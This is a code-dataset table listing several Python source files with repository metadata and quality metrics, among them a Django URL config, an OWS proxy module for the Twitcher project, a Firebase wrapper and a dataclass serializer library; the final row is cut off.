hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
29c5b6d5e37c256dbd101b9f9d2e7691b0313aef | 494 | py | Python | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | Backend/core/users/urls.py | Extraordinary01/freshnesecom | e16047d7f8a8d771125c4656351bae2b4389a1a6 | [
"MIT"
] | null | null | null | from django.urls import path
from .views import UserRetrieveUpdateDestroyView, activate, register, CheckUserAPIView, custom_login, reset_password, reset_password_email
urlpatterns = [
path("user/", UserRetrieveUpdateDestroyView.as_view()),
path("signup/", register),
path("check/", CheckUserAPIView.as_view()),
path("login/", custom_login),
path("activate/", activate),
path("reset-password/email/", reset_password_email),
path("reset-password/", reset_password)
]
| 38 | 138 | 0.738866 | 52 | 494 | 6.826923 | 0.403846 | 0.219718 | 0.152113 | 0.146479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123482 | 494 | 12 | 139 | 41.166667 | 0.819861 | 0 | 0 | 0 | 0 | 0 | 0.139676 | 0.04251 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.272727 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
29ed430dcb5413550cc35533f616785fbc2e32fa | 1,198 | py | Python | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | invenio_records_resources/resources/files/loaders.py | FlorianCassayre/invenio-records-resources | 80a2f6565653fd00e08c85b5aa8d1b1276cbb4e7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Files loaders."""
from flask import request
from flask_resources.deserializers import DeserializerMixin
from flask_resources.loaders import RequestLoader
class StreamDeserializer(DeserializerMixin):
"""Stream deserializer."""
def deserialize_data(self, data, *args, **kwargs):
"""Deserializes a stream."""
return data
class RequestStreamLoader(RequestLoader):
"""Loaded request representation for streams."""
def __init__(self, deserializer=None, args_parser=None, *args, **kwargs):
"""Constructor."""
self.deserializer = deserializer or StreamDeserializer()
self.args_parser = args_parser
def load_data(self):
"""Load data from request stream."""
return request.stream
def load_item_request(self, *args, **kwargs):
"""Build request context."""
return {
"request_stream": request.stream,
"request_content_length": request.content_length,
}
| 28.52381 | 77 | 0.681135 | 131 | 1,198 | 6.099237 | 0.51145 | 0.065081 | 0.045056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005274 | 0.208681 | 1,198 | 41 | 78 | 29.219512 | 0.837553 | 0.310518 | 0 | 0 | 0 | 0 | 0.045918 | 0.028061 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.176471 | 0 | 0.705882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
29ef0c133b11ec2729d3f3fae560acaa93314a16 | 8,251 | py | Python | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | null | null | null | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | 7 | 2018-06-20T14:02:39.000Z | 2019-09-27T14:01:18.000Z | twitcher/owsproxy.py | Ouranosinc/twitcher | 78cd4806d98c75b408355db86d388134776471a7 | [
"Apache-2.0"
] | null | null | null | """
The owsproxy is based on `papyrus_ogcproxy <https://github.com/elemoine/papyrus_ogcproxy>`_
See also: https://github.com/nive/outpost/blob/master/outpost/proxy.py
"""
import urllib
import requests
from pyramid.response import Response
from pyramid.settings import asbool
from twitcher._compat import urlparse
from twitcher.owsexceptions import OWSAccessForbidden, OWSAccessFailed
from twitcher.utils import replace_caps_url
from twitcher.store import servicestore_factory
import logging
LOGGER = logging.getLogger(__name__)
allowed_content_types = (
"application/xml", # XML
"text/xml",
"text/xml;charset=ISO-8859-1"
"application/vnd.ogc.se_xml", # OGC Service Exception
"application/vnd.ogc.se+xml", # OGC Service Exception
# "application/vnd.ogc.success+xml", # OGC Success (SLD Put)
"application/vnd.ogc.wms_xml", # WMS Capabilities
# "application/vnd.ogc.gml", # GML
# "application/vnd.ogc.sld+xml", # SLD
"application/vnd.google-earth.kml+xml", # KML
"application/vnd.google-earth.kmz",
"image/png", # PNG
"image/png;mode=32bit",
"image/gif", # GIF
"image/jpeg", # JPEG
"application/json", # JSON
"application/json;charset=ISO-8859-1",
)
# TODO: configure allowed hosts
allowed_hosts = (
# list allowed hosts here (no port limiting)
# "localhost",
)
# requests.models.Reponse defaults its chunk size to 128 bytes, which is very slow
class BufferedResponse():
def __init__(self, resp):
self.resp = resp
def __iter__(self):
return self.resp.iter_content(64 * 1024)
def _send_request(request, service, extra_path=None, request_params=None):
# TODO: fix way to build url
url = service['url']
if extra_path:
url += '/' + extra_path
if request_params:
url += '?' + request_params
LOGGER.debug('url = %s', url)
# forward request to target (without Host Header)
h = dict(request.headers)
h.pop("Host", h)
h['Accept-Encoding'] = None
#
service_type = service['type']
if service_type and (service_type.lower() != 'wps'):
try:
resp_iter = requests.request(method=request.method.upper(), url=url, data=request.body, headers=h,
stream=True)
except Exception as e:
return OWSAccessFailed("Request failed: {}".format(e.message))
# Headers meaningful only for a single transport-level connection
HopbyHop = ['Connection', 'Keep-Alive', 'Public', 'Proxy-Authenticate', 'Transfer-Encoding', 'Upgrade']
return Response(app_iter=BufferedResponse(resp_iter),
headers={k: v for k, v in resp_iter.headers.iteritems() if k not in HopbyHop})
else:
try:
resp = requests.request(method=request.method.upper(), url=url, data=request.body, headers=h)
except Exception, e:
return OWSAccessFailed("Request failed: {}".format(e.message))
if resp.ok is False:
if 'ExceptionReport' in resp.content:
pass
else:
return OWSAccessFailed("Response is not ok: {}".format(resp.reason))
# check for allowed content types
ct = None
# LOGGER.debug("headers=", resp.headers)
if "Content-Type" in resp.headers:
ct = resp.headers["Content-Type"]
if not ct.split(";")[0] in allowed_content_types:
msg = "Content type is not allowed: {}.".format(ct)
LOGGER.error(msg)
return OWSAccessForbidden(msg)
else:
# return OWSAccessFailed("Could not get content type from response.")
LOGGER.warn("Could not get content type from response")
try:
if ct in ['text/xml', 'application/xml', 'text/xml;charset=ISO-8859-1']:
# replace urls in xml content
proxy_url = request.route_url('owsproxy', service_name=service['name'])
# TODO: where do i need to replace urls?
content = replace_caps_url(resp.content, proxy_url, service.get('url'))
else:
# raw content
content = resp.content
except Exception:
return OWSAccessFailed("Could not decode content.")
headers = {}
if ct:
headers["Content-Type"] = ct
return Response(content, status=resp.status_code, headers=headers)
def owsproxy_url(request):
url = request.params.get("url")
if url is None:
return OWSAccessFailed("URL param is missing.")
service_type = request.GET.get('service', 'wps') or request.GET.get('SERVICE', 'wps')
# check for full url
parsed_url = urlparse(url)
if not parsed_url.netloc or parsed_url.scheme not in ("http", "https"):
return OWSAccessFailed("Not a valid URL.")
return _send_request(request, service=dict(url=url, name='external', service_type=service_type))
def owsproxy(request):
"""
TODO: use ows exceptions
"""
try:
service_name = request.matchdict.get('service_name')
extra_path = request.matchdict.get('extra_path')
store = servicestore_factory(request.registry)
service = store.fetch_by_name(service_name)
except Exception as err:
return OWSAccessFailed("Could not find service: {}.".format(err.message))
else:
return _send_request(request, service, extra_path, request_params=request.query_string)
def owsproxy_delegate(request):
"""
Delegates owsproxy request to external twitcher service.
"""
twitcher_url = request.registry.settings.get('twitcher.url')
protected_path = request.registry.settings.get('twitcher.ows_proxy_protected_path', '/ows')
url = twitcher_url + protected_path + '/proxy'
if request.matchdict.get('service_name'):
url += '/' + request.matchdict.get('service_name')
if request.matchdict.get('access_token'):
url += '/' + request.matchdict.get('service_name')
url += '?' + urllib.urlencode(request.params)
LOGGER.debug("delegate to owsproxy: %s", url)
# forward request to target (without Host Header)
# h = dict(request.headers)
# h.pop("Host", h)
resp = requests.request(method=request.method.upper(), url=url, data=request.body,
headers=request.headers, verify=False)
return Response(resp.content, status=resp.status_code, headers=resp.headers)
def includeme(config):
settings = config.registry.settings
protected_path = settings.get('twitcher.ows_proxy_protected_path', '/ows')
if asbool(settings.get('twitcher.ows_proxy', True)):
LOGGER.debug('Twitcher {}/proxy enabled.'.format(protected_path))
config.add_route('owsproxy', protected_path + '/proxy/{service_name}')
# TODO: maybe configure extra path
config.add_route('owsproxy_extra', protected_path + '/proxy/{service_name}/{extra_path:.*}')
config.add_route('owsproxy_secured', protected_path + '/proxy/{service_name}/{access_token}')
# use delegation mode?
if asbool(settings.get('twitcher.ows_proxy_delegate', False)):
LOGGER.debug('Twitcher {}/proxy delegation mode enabled.'.format(protected_path))
config.add_view(owsproxy_delegate, route_name='owsproxy')
config.add_view(owsproxy_delegate, route_name='owsproxy_secured')
else:
# include twitcher config
config.include('twitcher.config')
# include mongodb
config.include('twitcher.db')
config.add_view(owsproxy, route_name='owsproxy')
config.add_view(owsproxy, route_name='owsproxy_secured')
config.add_view(owsproxy, route_name='owsproxy_extra')
# use /owsproxy?
if asbool(settings.get('twitcher.ows_proxy_url', True)):
LOGGER.debug('Twitcher /owsproxy enabled.')
config.add_route('owsproxy_url', '/owsproxy')
config.add_view(owsproxy_url, route_name='owsproxy_url')
| 39.478469 | 111 | 0.633863 | 963 | 8,251 | 5.296989 | 0.240914 | 0.023721 | 0.019996 | 0.024701 | 0.336013 | 0.278965 | 0.208783 | 0.142717 | 0.08861 | 0.08861 | 0 | 0.004353 | 0.248334 | 8,251 | 208 | 112 | 39.668269 | 0.818123 | 0.119016 | 0 | 0.101449 | 0 | 0 | 0.199079 | 0.064056 | 0 | 0 | 0 | 0.014423 | 0 | 0 | null | null | 0.007246 | 0.065217 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4b0387dd6595c147f8f9554794056d6e4ecf303e | 514 | py | Python | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 421 | 2015-06-02T16:29:59.000Z | 2021-06-03T18:44:42.000Z | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 404 | 2015-06-02T20:23:42.000Z | 2019-08-21T16:59:41.000Z | dusty/commands/shell.py | gamechanger/dusty | dd9778e3a4f0c623209e53e98aa9dc1fe76fc309 | [
"MIT"
] | 16 | 2015-06-16T17:21:02.000Z | 2020-03-27T02:27:09.000Z | from ..compiler.spec_assembler import get_specs
from . import utils
from ..systems.docker import get_dusty_container_name
def execute_shell(app_or_service_name):
specs = get_specs()
if app_or_service_name not in [spec.name for spec in specs.get_apps_and_services()]:
raise KeyError('No app or service found named {}'.format(app_or_service_name))
exec_options = utils.exec_docker_options()
utils.exec_docker('exec', exec_options, get_dusty_container_name(app_or_service_name), '/bin/bash')
| 46.727273 | 103 | 0.780156 | 80 | 514 | 4.6375 | 0.45 | 0.067385 | 0.161725 | 0.172507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128405 | 514 | 10 | 104 | 51.4 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0.087549 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
4b0977a5ab8558b20c59dbf03ddb7ba67c5eb19b | 278 | py | Python | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 4 | 2021-07-05T10:49:26.000Z | 2021-11-24T11:34:43.000Z | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 39 | 2021-06-21T15:02:37.000Z | 2022-02-28T15:07:42.000Z | server/server/termsofuse/api/serializers.py | connectiveproject/connective | 8866082b2147feef0e5254ac4215987b9d881396 | [
"MIT"
] | 17 | 2021-06-16T08:59:45.000Z | 2021-09-29T11:35:38.000Z | from rest_framework import serializers
from ..models import TermsOfUseDocument
class TermsOfUseDocumentSerializer(serializers.ModelSerializer):
class Meta:
model = TermsOfUseDocument
fields = ["document_text"]
read_only_fields = ["document_text"]
| 25.272727 | 64 | 0.748201 | 25 | 278 | 8.12 | 0.68 | 0.137931 | 0.17734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18705 | 278 | 10 | 65 | 27.8 | 0.89823 | 0 | 0 | 0 | 0 | 0 | 0.093525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b18bec3031043bd614f7445f297413e4dc84dc1 | 1,108 | py | Python | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | 2 | 2020-11-07T07:21:11.000Z | 2020-11-07T07:53:32.000Z | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | null | null | null | PYPI python package/multivicks/crud.py | imvickykumar999/100th-Repository-Morsetor-python-Package | 6dce1df886e1ea0563a4cae53932b654d549315b | [
"MIT"
] | 1 | 2020-11-10T06:49:05.000Z | 2020-11-10T06:49:05.000Z |
# pip install imvickykumar999
# C:\Users\Vicky\anaconda3\Lib\site-packages\vicksbase
class HomeAutomation:
def __init__(self, link):
try:
from vicksbase import firebase as f
self.link = link
self.firebase_obj = f.FirebaseApplication(self.link, None)
print(self.pull(child = '/'))
except Exception as e:
print(e)
print('try: pip install imvickykumar999')
def show(self):
return self.link
def pull(self, child = 'A/B/C/Switch'):
result = self.firebase_obj.get(f'{child}', None)
return result
def push(self, data = 1, child = 'A/B/C/Switch'):
self.firebase_obj.put('/', child, data)
return self.pull(child = '/')
def remove(self, child = 'A/B/C/led2'):
data = self.firebase_obj.delete('/', child)
return self.pull(child = '/')
# link = 'https://led-blink-wifi-default-rtdb.firebaseio.com/'
# obj = HomeAutomation(link)
# f = obj.show()
# f = obj.pull()
# f = obj.push(1)
# f = obj.remove()
# print(f)
# input('Press Enter to Exit...')
| 25.181818 | 70 | 0.588448 | 144 | 1,108 | 4.472222 | 0.409722 | 0.049689 | 0.093168 | 0.037267 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01218 | 0.259025 | 1,108 | 43 | 71 | 25.767442 | 0.772229 | 0.245487 | 0 | 0.095238 | 0 | 0 | 0.09466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.238095 | false | 0 | 0.047619 | 0.047619 | 0.52381 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b19ea7ef02e099c43c87d4eeeed72882f3212a4 | 152 | py | Python | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | python_learning/check_num.py | liu0g/hello-World | 45eb76c56e082657d0f4af0a5eb49244b369a412 | [
"MIT"
] | null | null | null | __author__ = 'lg'
a = raw_input()
if a > 0:
print('positive number')
elif a < 0:
print('negative number')
else:
print('the number is zero') | 16.888889 | 31 | 0.618421 | 23 | 152 | 3.869565 | 0.695652 | 0.044944 | 0.157303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017094 | 0.230263 | 152 | 9 | 31 | 16.888889 | 0.74359 | 0 | 0 | 0 | 0 | 0 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.375 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4b1d3dca6a1626c014a1c6d63353cec64b5b9b02 | 7,517 | py | Python | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 5 | 2019-10-28T15:40:03.000Z | 2021-03-16T21:07:25.000Z | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 32 | 2019-10-19T08:40:12.000Z | 2022-01-21T19:07:09.000Z | src/typefit/serialize.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 3 | 2019-10-28T15:42:49.000Z | 2022-01-18T19:18:06.000Z | from collections import ChainMap, abc
from dataclasses import fields, is_dataclass
from datetime import date, datetime
from enum import Enum
from json import dumps
from typing import Any, get_type_hints
from uuid import UUID
from .meta import Source
class Serializer:
"""
Base serializer, that has no opinion and will serialize anything that is
100% to serialize without making any assumption.
Supported types are:
- Numbers (int, float)
- Booleans
- Strings
- Sequences
- Mappings
- Named (and typed) tuples
- Dataclasses (including with Typefit metadata in the field)
- Any object with a `__typefit_serialize__()` method
- Enums
You'll notice that the behavior of this class is a best effort to make
something sane and simple. This means there is no warranty that this works:
>>> base: SomeData = # Some data
>>> serialized = serialize(base)
>>> assert typefit(SomeData, serialized) == base
If you want more types to be recognized by this serializer, you can inherit
from it and extend the :py:meth:`~.Serializer.find_serializer()` method.
If you don't know where to look, check out the following methods:
- :py:meth:`~.typefit.serialize.Serializer.serialize`
- :py:meth:`~.typefit.serialize.Serializer.json`
See Also
--------
SaneSerializer
"""
def find_serializer(self, obj: Any):
"""
Trying to be as generic as possible. There is a few tricks there, like
strings which are also sequences so the order of tests matters quite a
lot.
Please override this if you want to change the behavior. See how it's
done in :py:class:`~.typefit.serialize.SaneSerializer` for an idea
on how to do it.
"""
if hasattr(obj, "__typefit_serialize__"):
return self.serialize_typefit
elif isinstance(obj, (int, float, bool, str)) or obj is None:
return self.serialize_generic
elif isinstance(obj, tuple) and hasattr(obj, "_fields"):
return self.serialize_tuple
elif is_dataclass(obj):
return self.serialize_dataclass
elif isinstance(obj, abc.Sequence):
return self.serialize_sequence
elif isinstance(obj, abc.Mapping):
return self.serialize_mapping
elif isinstance(obj, Enum):
return self.serialize_enum
def serialize_generic(self, obj: Any) -> Any:
"""
By default, leave the object untouched
"""
return obj
def serialize_tuple(self, obj: tuple):
"""
Named tuples are expected to have typing annotations, we'll use that
as a reference to get the fields list, however types are not enforced.
"""
return {
k: self.serialize(getattr(obj, k)) for k in get_type_hints(obj.__class__)
}
def serialize_sequence(self, obj: abc.Sequence):
"""
Sequences are converted to regular lists, and each item of the list
is recursively serialized.
"""
return [self.serialize(x) for x in obj]
def serialize_typefit(self, obj: Any):
"""
Serializes an object by calling its `__typefit_serialize__()` method.
"""
return obj.__typefit_serialize__()
def serialize_dataclass(self, obj: Any):
"""
Dataclasses are mappings but they merit a special attention due to the
fact that their fields are not necessarily the fields that will be
used in the output, thanks to the `meta(source=X)` feature.
Notes
-----
See :py:class:`~.typefit.meta.Source`, but basically the conversion to
JSON structure generates a series of dictionaries that are then
superposed into a single dictionary and returned.
All values of this dictionary are of course recursively serialized.
"""
def _get_values():
for field in fields(obj.__class__):
if field.metadata and "typefit_source" in field.metadata:
source: Source = field.metadata["typefit_source"]
yield {
k: self.serialize(v)
for k, v in source.value_to_json(field.name, obj).items()
}
else:
yield {field.name: self.serialize(getattr(obj, field.name))}
return dict(ChainMap(*_get_values()))
def serialize_mapping(self, obj: abc.Mapping):
"""
Mappings are just copied into another mapping. While copying, all the
values are recursively serialized.
"""
return {k: self.serialize(v) for k, v in obj.items()}
def serialize_enum(self, obj: Enum):
"""
Enums are serialized into their value.
"""
return self.serialize(obj.value)
def serialize(self, obj: Any):
"""
Transforms a given object into a structure of basic types which can
easily be serialized to JSON. It is not a strict inverse of
:py:func:`~.typefit.typefit` but it should be good enough for most
uses.
Please note that this at least assumes that objects are consistent with
their type declarations, no additional security is put in place.
This method relies on the :py:meth:`~.Serializer.find_serializer()`
method, which means that if you implement a subclass in order to
change the mapping of serialization functions you should override
:py:meth:`~.Serializer.find_serializer()`.
Parameters
----------
obj
Object to be serialized
"""
serializer = self.find_serializer(obj)
return serializer(obj)
def json(self, obj: Any) -> str:
"""
Shortcut to transform an object into a JSON string going through
:py:meth:`~.serialize`.
"""
return dumps(self.serialize(obj))
class SaneSerializer(Serializer):
"""
Opinionated version of what sane default for non-JSON-standard types
should be. Comes as an extension of
:py:class:`~.Serializer`.
- Dates are serialized to the ISO format
- UUIDs are serialized into their default str() representation
"""
def find_serializer(self, obj: Any):
"""
Tries to find special cases and if none of them are matched then
resort to the parent method.
"""
if isinstance(obj, datetime):
return self.serialize_std_datetime
elif isinstance(obj, date):
return self.serialize_std_date
elif isinstance(obj, UUID):
return self.serialize_uuid
else:
return super().find_serializer(obj)
def serialize_uuid(self, obj: UUID):
"""
UUIDs are simply converted to strings
"""
return f"{obj}"
def serialize_std_datetime(self, obj: datetime):
"""
Datetime are converted into ISO format
"""
return obj.isoformat()
def serialize_std_date(self, obj: date):
"""
Dates are converted to ISO format
"""
return obj.isoformat()
def serialize(obj: Any) -> Any:
"""
Shortcut to use the :py:class:`~.typefit.serialize.SaneSerializer`'s
:py:meth:`~.typefit.serialize.Serializer.serialize` method.
Parameters
----------
obj
Object to be serializer
"""
return SaneSerializer().serialize(obj)
| 31.061983 | 85 | 0.624584 | 925 | 7,517 | 4.995676 | 0.291892 | 0.047825 | 0.04934 | 0.012984 | 0.112097 | 0.072712 | 0.043281 | 0.009522 | 0 | 0 | 0 | 0.000564 | 0.292803 | 7,517 | 241 | 86 | 31.190871 | 0.868698 | 0.476919 | 0 | 0.082192 | 0 | 0 | 0.019158 | 0.006595 | 0 | 0 | 0 | 0 | 0 | 1 | 0.219178 | false | 0 | 0.109589 | 0 | 0.684932 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
4b254f85ca684200ef8973061a3a39dab730b676 | 2,632 | py | Python | spo/utils/mandat_invoice.py | libracore/spo | c6617a4624d683e27ee3fde745313c30504f3fd1 | [
"MIT"
] | null | null | null | spo/utils/mandat_invoice.py | libracore/spo | c6617a4624d683e27ee3fde745313c30504f3fd1 | [
"MIT"
